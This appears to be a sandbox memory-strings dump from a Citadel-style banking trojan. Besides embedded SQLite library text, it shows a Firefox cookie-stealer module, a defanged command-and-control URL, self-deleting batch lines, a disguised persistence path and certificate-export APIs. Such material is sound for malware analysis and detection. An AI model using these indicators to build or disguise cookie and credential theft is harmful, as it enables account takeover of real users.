PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%Documents and Settings%\%current user%\Application Data\scvhost.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

DW20.EXE_2176_rwx_00AB0000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}
:\Documents and Settings\"%CurrentUserName%"\Application Data\Muaz\ydfeb.ofo
%Documents and Settings%\%current user%\Application Data\Muaz
ydfeb.ofo

DW20.EXE_2176_rwx_014A0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

svchost.exe_2084_rwx_00130000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
